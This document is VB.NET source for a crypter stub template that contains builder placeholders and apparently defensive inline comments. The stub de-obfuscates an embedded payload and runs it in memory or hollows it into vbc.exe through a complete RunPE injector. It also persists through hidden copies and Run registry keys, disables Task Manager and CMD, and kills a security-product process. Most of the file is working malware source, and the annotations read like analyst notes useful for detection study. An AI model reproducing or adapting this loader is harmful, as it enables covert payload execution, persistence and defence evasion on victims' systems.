- Imports System.Windows
- Imports System
- Imports System.Net
- Imports System.IO
- Imports System.Text
- Imports System.Reflection
- Imports System.Windows.Forms
- Imports System.IO.FileStream
- Imports Microsoft.VisualBasic
- Imports System.Runtime.InteropServices
- Imports System.ComponentModel
- Imports Microsoft.Win32
- Imports System.Diagnostics
- Imports System.Runtime.CompilerServices
- Imports System.Object
- #VersionInfo#
- #fakejunk1#
- Module %1%
- ' Stub configuration. Every %n% token is a builder placeholder substituted before
- ' compilation; as pasted, this is a template and does not compile.
- ' The feature flags below are compared against the literal "T" in Main.
- Dim %2% As String = %3%
- ' The key is hard-coded, so the embedded payload is recoverable from the stub without
- ' running it (PolyXorbyMiharbiDono is XOR obfuscation, not encryption).
- Dim c As New PolyXorbyMiharbiDono("EncryptionKEY")
- ' Payload bytes: base64 -> Deflate-decompress (DeCompress) -> XOR de-obfuscate.
- Dim %4% As Byte() = c.PolyDeCrypt(DeCompress(Convert.FromBase64String(%2%)))
- Dim %5% As String = "%6%" & ".exe" ' not referenced in the visible code
- ' "T" = try to load the payload as a managed assembly in-process (RunExe); on failure fall back to RunPE.Inject.
- Dim Auto As String = "%88%"
- ' "T" = run the payload in-process via Exe() before the other steps.
- Dim DotNet As String = "%999%"
- ' "T" = copy self to %APPDATA%, mark it Hidden, and register two HKCU\...\Run values.
- Dim startup As String="%90%"
- Dim AntiT As String = "ThisnThat" ' not referenced in the visible code
- ' "T" = spawn REG.exe to set DisableTaskMgr.
- Dim AntiTaskss As String="antitask"
- ' "T" = set the DisableCMD policy value under HKCU.
- Dim Dna As String="disablecmd"
- Dim AntiSystems As String="antisystem" ' not referenced in the visible code
- ' "T" = call AntiMalwarebytes() (process-kill loop).
- Dim antimals As String="antimal"
- Dim microSs As String="microS" ' not referenced in the visible code
- ' Hollowing host path: first character of the system directory (drive letter) plus a fixed
- ' .NET 2.0 vbc.exe path. Where that framework directory is absent the path does not exist,
- ' and CreateProcess inside RunPE.Inject presumably fails, so the fallback returns silently.
- Dim vbc As String=Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
- ''' <summary>
- ''' Inflates a raw Deflate stream into a byte array by reading 100-byte chunks and
- ''' growing the buffer with ReDim Preserve on every iteration. Used on the base64-decoded
- ''' payload blob before PolyDeCrypt.
- ''' </summary>
- ''' <param name="input">Deflate-compressed bytes.</param>
- ''' <returns>The decompressed bytes, trimmed to exactly Count bytes.</returns>
- ''' <remarks>
- ''' Neither the MemoryStream nor the DeflateStream is disposed. The per-iteration
- ''' ReDim Preserve makes this quadratic in the output size. A zero-length result
- ''' ends in ReDim Preserve Buffer(-1), which yields an empty array.
- ''' </remarks>
- Public Function DeCompress(ByVal input() As Byte) As Byte()
- Dim m As New IO.MemoryStream(input)
- Dim c As New IO.Compression.DeflateStream(m, IO.Compression.CompressionMode.Decompress)
- Dim Buffer() As Byte
- Dim Offset As Integer = 0
- Dim Count As Integer = 0
- While True
- ' Grow by 100 before each read; Offset and Count always advance together.
- ReDim Preserve Buffer(Count + 100)
- Dim Bytes As Integer = c.Read(Buffer, Offset, 100)
- If Bytes = 0 Then Exit While
- Offset += Bytes
- Count += Bytes
- End While
- ' Drop the unused tail (VB upper bound is inclusive, so Count - 1 keeps Count bytes).
- ReDim Preserve Buffer(Count - 1)
- Return Buffer
- End Function
- ' Entry point. Each feature runs only when its flag field equals the literal "T", and
- ' every action is wrapped in an empty Catch, so failures are silent. The observable
- ' artefacts of each step are noted inline for triage and cleanup.
- Sub Main()
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' DisableCMD policy under HKCU\Software\Policies\Microsoft\Windows\System: a single
- ' registry value write, cheap to monitor and to revert.
- if Dna="T" then
- Try
- My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "1", Microsoft.Win32.RegistryValueKind.DWord)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' DisableTaskMgr is set by spawning a hidden REG.exe rather than through the registry API;
- ' the child process and its command line are a usable detection point.
- if AntiTaskss="T" then
- Try
- Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' Persistence: copy of the running executable into %APPDATA% with the Hidden attribute,
- ' then two HKCU\...\Run values ("1" & ProductName here, and "%111%" via
- ' addtostartup_Adminreq). The copied file and both Run values are the cleanup targets.
- ' File.Copy throws if the destination already exists, which the empty Catch hides.
- If startup = "T" Then
- Try
- IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, _
- System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
- IO.File.SetAttributes(System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath), IO.FileAttributes.Hidden)
- My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
- True).SetValue("1" & System.Windows.Forms.Application.ProductName, _
- System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
- addtostartup_Adminreq("%111%", Application.ExecutablePath)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' ThreadStart.Invoke runs the delegate synchronously on this thread; no new thread is
- ' created despite the name. Exe() is not wrapped in Try, so an exception here ends the stub.
- If DotNet = "T" Then
- Dim thr1 As New Threading.ThreadStart(AddressOf Exe)
- thr1.Invoke()
- Else: End If
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' Kills any process whose name matches the literal in AntiMalwarebytes().
- If antimals = "T" Then
- Try
- AntiMalwarebytes()
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ' Loads the payload as a managed assembly in-process and invokes its entry point via RunExe.
- ' If Assembly.Load throws (presumably because the payload is not a .NET image), the Catch
- ' falls back to process hollowing into vbc.exe. Both branches of the bitness check call
- ' RunPE.Inject with the same arguments, so os.is64Bit() has no effect on behaviour.
- If Auto = "T" Then
- Try
- Assembly.Load(%4%)
- Dim thr As New Threading.ThreadStart(AddressOf RunExe)
- thr.Invoke()
- Catch e As Exception
- if os.is64Bit()=True Then
- RunPE.Inject(%4%,vbc)
- Else
- RunPE.Inject(%4%,vbc)
- End If
- End Try
- Else: End If
- ' Terminates the stub process; anything hollowed or persisted above outlives it.
- End
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>
- ''' Writes Name = Path (REG_SZ) under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
- ''' Despite the name this is the per-user Run key, which needs no elevation. The key is
- ''' opened writable and never closed, and any failure is swallowed by the empty Catch.
- ''' </summary>
- ''' <param name="Name">Run value name; Main passes the builder placeholder "%111%".</param>
- ''' <param name="Path">Path stored as the value; Main passes Application.ExecutablePath.</param>
- Public Sub addtostartup_Adminreq(ByVal Name As String, ByVal Path As String)
- Try
- Dim Registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
- Dim Key As Microsoft.Win32.RegistryKey = Registry.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
- Key.SetValue(Name, Path, Microsoft.Win32.RegistryValueKind.String)
- Catch ex As Exception
- End Try
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>
- ''' Enumerates every process, lower-cases its name and calls Kill on any whose name
- ''' equals the single Select Case literal "Msseces". Declared without a return type or a
- ''' Return statement, so it returns Nothing. Kill on a process this user cannot open
- ''' throws; the caller's empty Catch hides that. Process-termination attempts from this
- ''' stub are a detection point.
- ''' </summary>
- Function AntiMalwarebytes()
- Dim malwarebytes As Process() = Process.GetProcesses
- Dim i As Integer
- For i = 0 To malwarebytes.Length - 1
- Select Case Strings.LCase(malwarebytes(i).ProcessName)
- Case "Msseces"
- malwarebytes(i).Kill()
- Case Else
- End Select
- Next
- End Function
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>
- ''' Reflectively loads the payload bytes (%4%) as a managed assembly inside this process
- ''' and invokes its entry point with a one-element args array {"1"}. CreateInstance is
- ''' given the entry point's method name as a type name; presumably no such type exists and
- ''' it returns Nothing, which is an acceptable target for a Shared Main. Identical to Exe()
- ''' except for the argument value. Assembly.Load from a byte array with no backing file is
- ''' a characteristic in-memory loader pattern.
- ''' </summary>
- Public Sub RunExe()
- Dim Resource As String = String.Empty ' unused
- Dim ResourcesBuffer As Byte() = %4%
- Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
- Dim entryPoint As MethodInfo = [assembly].EntryPoint
- Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
- entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
- End Sub
- ''' <summary>
- ''' Same in-process reflective load as RunExe(), but the payload's entry point receives
- ''' the args array {"2"}. Called synchronously from Main's DotNet path without a Try block,
- ''' so a failure here propagates and ends the stub.
- ''' </summary>
- Public Sub Exe()
- Dim Resource As String = String.Empty ' unused
- Dim ResourcesBuffer As Byte() = %4%
- Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
- Dim entryPoint As MethodInfo = [assembly].EntryPoint
- Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
- entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"2"}})
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>OS bitness probe based on the ProgramW6432 environment variable.</summary>
- public Class os
- 'this will check for 64 bit and 32 bit ops
- ''' <summary>
- ''' Returns True when ProgramW6432 is set and non-empty (the variable exists on 64-bit
- ''' Windows). A missing variable yields Nothing, which VB string comparison treats as
- ''' equal to "", so the result is False. In Main both outcomes lead to the same call.
- ''' </summary>
- Public Shared Function is64Bit() As Boolean
- If Not System.Environment.GetEnvironmentVariable("ProgramW6432") = "" Then
- Return True
- Else
- Return False
- End If
- End Function
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>
- ''' Process-hollowing loader ("RunPE"): creates the target suspended, unmaps its image,
- ''' writes the payload PE into the child, patches the child's image base, points EAX at
- ''' the payload entry point and resumes the thread. The Context layout, the 248-byte NT
- ''' header and the Ebx-based PEB access are all x86-only.
- ''' Win32 APIs are resolved at run time through LoadLibraryA/GetProcAddress, so the compiled
- ''' stub's import table shows only those two; the other API names remain as plain strings.
- ''' Detection points: CreateProcess with CREATE_SUSPENDED followed by
- ''' ZwUnmapViewOfSection / WriteProcessMemory / SetThreadContext / ResumeThread on the same
- ''' child, and a vbc.exe whose in-memory image no longer matches its file on disk.
- ''' </summary>
- Public Class RunPE
- ' Page-protection constants. None are referenced by Inject, which passes literal values.
- Public Const PAGE_NOCACHE As Long = &H200
- Public Const PAGE_EXECUTE_READWRITE As Long = &H40
- Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
- Public Const PAGE_EXECUTE_READ As Long = &H20
- Public Const PAGE_EXECUTE As Long = &H10
- Public Const PAGE_WRITECOPY As Long = &H8
- Public Const PAGE_NOACCESS As Long = &H1
- Public Const PAGE_READWRITE As Long = &H4
- Public Const PAGE_READONLY As UInt32 = &H2
- ''' <summary>
- ''' Hollows <paramref name="target"/> with the PE image in <paramref name="data"/>.
- ''' Returns silently on any failed check; no handle is closed and no child process is
- ''' terminated on those paths, so a suspended target can be left behind.
- ''' </summary>
- ''' <param name="data">Raw PE image (MZ/PE headers plus sections) to run.</param>
- ''' <param name="target">Path of the host executable to create suspended.</param>
- Public Shared Sub Inject(ByVal data() As Byte, ByVal target As String)
- Dim C = New Context, SH As Section_Header, PI = New Process_Information, SI = New Startup_Information, PS = New Security_Flags, TS = New Security_Flags
- ' Pin the payload so header structures can be marshalled straight out of it.
- Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
- ' Buffer keeps the raw address after GC.Free() below; later PtrToStructure calls read
- ' through it while the array is no longer pinned.
- Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
- Dim DH As New DOS_Header
- DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
- GC.Free()
- ' Run-time API resolution; see the class summary.
- Dim CP As CP = CreateAPI(Of CP)("kernel32", "CreateProcessA")
- Dim GTC As GTC = CreateAPI(Of GTC)("kernel32", "GetThreadContext")
- Dim RPM As RPM = CreateAPI(Of RPM)("kernel32", "ReadProcessMemory")
- Dim WPM As WPM = CreateAPI(Of WPM)("kernel32", "WriteProcessMemory")
- Dim UVS As UVS = CreateAPI(Of UVS)("ntdll", "ZwUnmapViewOfSection")
- Dim VA As VA = CreateAPI(Of VA)("kernel32", "VirtualAllocEx")
- Dim STC As STC = CreateAPI(Of STC)("kernel32", "SetThreadContext")
- Dim RT As RT = CreateAPI(Of RT)("kernel32", "ResumeThread")
- ' First CreateProcess (flags 4 = CREATE_SUSPENDED), made before SI.CB is set and repeated
- ' below. Its PI handles are overwritten by the second call, so this child is left suspended
- ' and never used: two suspended instances of the target are an observable side effect.
- If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
- Dim NH As New NT_Headers
- ' NT headers sit at the DOS header's e_lfanew (DH.Address) within the pinned-at-the-time buffer.
- NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
- Dim Address, Offset As Long, ret As UInteger
- SI.CB = Len(SI)
- ' 65539 = &H10003 = CONTEXT_FULL on x86 (CONTEXT_i386 Or CONTEXT_CONTROL Or CONTEXT_INTEGER).
- C.Flags = 65539
- ' 17744 = &H4550 ("PE"), 23117 = &H5A4D ("MZ").
- If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
- ' Second, effective CreateProcess; the child starts suspended.
- If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
- GTC(PI.Thread, C)
- ' Reads 4 bytes at Ebx + 8 in the child. At x86 thread start Ebx presumably holds the PEB,
- ' making this PEB.ImageBaseAddress - consistent with the write-back of the same slot below.
- RPM(PI.Process, C.Ebx + 8, Address, 4, 0)
- ' Unmaps the host's original image at that base.
- UVS(PI.Process, Address)
- ' 12288 = &H3000 = MEM_COMMIT Or MEM_RESERVE; 4 = PAGE_READWRITE. The allocation is requested
- ' at the payload's preferred ImageBase with SizeOfImage bytes.
- Dim ImageBase As UInt32 = VA(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
- If ImageBase <> 0 Then
- ' Headers first, then each section copied from its raw file offset to its virtual address.
- WPM(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
- ' 248 = size of IMAGE_NT_HEADERS32; 40 = size of IMAGE_SECTION_HEADER.
- Offset = DH.Address + 248
- For I As Integer = 0 To NH.File.Sections - 1
- SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
- ' Raw(SH.Size) allocates SH.Size + 1 bytes (inclusive upper bound); the last byte is never written.
- Dim Raw(SH.Size) As Byte
- For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
- WPM(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
- Next I
- ' Patch the child's image-base slot, set EAX to the payload entry point and resume.
- Dim T = BitConverter.GetBytes(ImageBase)
- WPM(PI.Process, C.Ebx + 8, T, 4, ret)
- C.Eax = ImageBase + NH.Optional.Address
- STC(PI.Thread, C)
- RT(PI.Thread)
- End If
- End Sub
- ' The only two static imports; everything else goes through CreateAPI.
- Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
- Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
- ''' <summary>
- ''' Resolves the export <paramref name="method"/> from module <paramref name="name"/> and
- ''' wraps the function pointer in delegate type <typeparamref name="T"/>. A missing export
- ''' gives a null pointer and GetDelegateForFunctionPointer throws.
- ''' </summary>
- Private Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
- Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
- End Function
- ' Marshalling layouts. Field names are abbreviated forms of the Win32/PE names; notably
- ' DOS_Header.Address is e_lfanew, Optional_Headers.Address is AddressOfEntryPoint,
- ' .Image is ImageBase, .SImage is SizeOfImage and .SHeaders is SizeOfHeaders.
- ' x86 CONTEXT: ContextFlags, Dr0-3/6/7, FloatSave, segment and integer registers, 512-byte extended area.
- <StructLayout(0)> Structure Context
- Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
- Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
- End Structure
- ' FLOATING_SAVE_AREA.
- <StructLayout(0)> Structure Save
- Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
- Dim State As UInt32
- End Structure
- Structure Misc
- Dim Address, Size As UInt32
- End Structure
- ' IMAGE_SECTION_HEADER. Name is declared as a single Byte here rather than the 8-byte
- ' array of the real header, so the field offsets that follow do not match the on-disk
- ' layout as written; the Inject loop nevertheless reads Address, Size and Pointer from it.
- Structure Section_Header
- Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
- End Structure
- ' PROCESS_INFORMATION.
- Structure Process_Information
- Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
- End Structure
- ' STARTUPINFO (ANSI).
- <StructLayout(0, CharSet:=3)> Structure Startup_Information
- Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
- Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
- End Structure
- ' SECURITY_ATTRIBUTES.
- <StructLayout(0)> Structure Security_Flags
- Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
- End Structure
- ' IMAGE_DOS_HEADER; Address = e_lfanew.
- <StructLayout(0)> Structure DOS_Header
- Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
- Dim ID, Info As UInt16
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
- Dim Address As Int32
- End Structure
- ' IMAGE_NT_HEADERS32.
- Structure NT_Headers
- Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
- End Structure
- ' IMAGE_FILE_HEADER; Sections = NumberOfSections.
- <StructLayout(0)> Structure File_Header
- Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
- End Structure
- ' IMAGE_OPTIONAL_HEADER32.
- <StructLayout(0)> Structure Optional_Headers
- Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
- Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
- Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
- End Structure
- <StructLayout(0)> Structure Data_Directory
- Dim Address, Size As UInt32
- End Structure
- ' Delegate signatures for the run-time-resolved APIs (all 32-bit address widths).
- Delegate Function CP(ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
- Delegate Function WPM(ByVal process As IntPtr, ByVal address As Integer, ByVal buffer As Byte(), ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
- Delegate Function RPM(ByVal process As IntPtr, ByVal address As Integer, ByRef buffer As Integer, ByVal size As Integer, ByRef read As Integer) As Integer
- Delegate Function VA(ByVal process As IntPtr, ByVal address As Integer, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
- Delegate Function UVS(ByVal process As IntPtr, ByVal address As Integer) As Long
- Delegate Function RT(ByVal thread As IntPtr) As UInt32
- Delegate Function GTC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
- Delegate Function STC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- ''' <summary>
- ''' Payload obfuscation layer. PolyDeCrypt applies a key-derived XOR pass and then undoes a
- ''' running byte sum. This is reversible obfuscation with the key embedded in the stub
- ''' ("EncryptionKEY" in this template), not encryption: the payload can be recovered
- ''' statically from the base64 blob, the key and this class.
- ''' </summary>
- Public Class PolyXorbyMiharbiDono
- ''' <summary>
- ''' Reverses the corresponding crypt routine: XOR with the key schedule, then subtract
- ''' each previous byte from the current one (mod 256), dropping the leading byte.
- ''' Data is modified in place by XorCrypt before the new buffer is built.
- ''' </summary>
- ''' <param name="Data">Obfuscated bytes; must hold at least two bytes or the ReDim below fails.</param>
- ''' <returns>A buffer one byte shorter than Data.</returns>
- Public Function PolyDeCrypt(ByVal Data() As Byte) As Byte()
- 'This Function is the exact reverse of the crypt function.
- 'we should Decrypt to get our last randomized data.
- ' Encoding.Default is the system ANSI code page; for an ASCII key this is immaterial.
- Data = XorCrypt(Data, Encoding.Default.GetBytes(Key))
- Dim i As Integer
- 'Now in the other function the return value is a one byte bigger array. lets remove that one
- Dim ReturnBuffer(Data.Length - 2) As Byte
- 'we started from Byte n# 0 to the last one. we'll play it reversed now.
- For i = Data.Length - 1 To 1 Step -1
- 'We just remove The previous byte value from the current one Mod 256. simple
- ReturnBuffer(i - 1) = ModuloByte(Data(i), -Data(i - 1))
- Next
- 'That's it. The Buffer is one byte less then the data. Perfect. Return it.
- Return ReturnBuffer
- End Function
- 'A Positive Mod 256. This will prevent a non byte value. the result is always >= 0 and <= 255
- ''' <summary>Returns (MyByte + Addition) mod 256, first lifting a negative Addition into range.</summary>
- Private Function ModuloByte(ByVal MyByte As Byte, ByVal Addition As Int16) As Byte
- While Addition < 0
- Addition += 256
- End While
- Return Convert.ToByte((MyByte + Addition) Mod 256)
- End Function
- ''' <summary>
- ''' XORs each byte of Data in place with two key-derived bytes (indexed through the key
- ''' itself and through i + (i Mod 7)) and returns the same array. An empty key leaves
- ''' Data unchanged. Symmetric, so the same call both obfuscates and de-obfuscates.
- ''' </summary>
- Private Function XorCrypt(ByVal Data() As Byte, ByVal Key() As Byte) As Byte()
- If Key.Length <> 0 Then
- Dim i As Integer
- For i = 0 To Data.Length - 1
- Data(i) = Data(i) Xor ModuloByte(Key(i Mod Key.Length), [Key](Key(i Mod Key.Length) Mod Key.Length)) Xor [Key](((i + (i Mod 7)) Mod Key.Length) Mod Key.Length)
- Next
- End If
- Return Data
- End Function
- Private sKey As String = ""
- 'Property, will Give us acces to the key.
- Public Property Key() As String
- Get
- Return sKey
- End Get
- Set(ByVal value As String)
- sKey = value
- End Set
- End Property
- 'Inisalization. (New Constructor)
- ''' <summary>Creates an instance using the given key string.</summary>
- Public Sub New(ByVal Key As String)
- Me.Key = Key
- End Sub
- ''' <summary>Creates an instance with an empty key (XorCrypt then becomes a no-op).</summary>
- Public Sub New()
- Me.Key = ""
- End Sub
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- End Module
- #fakejunk2#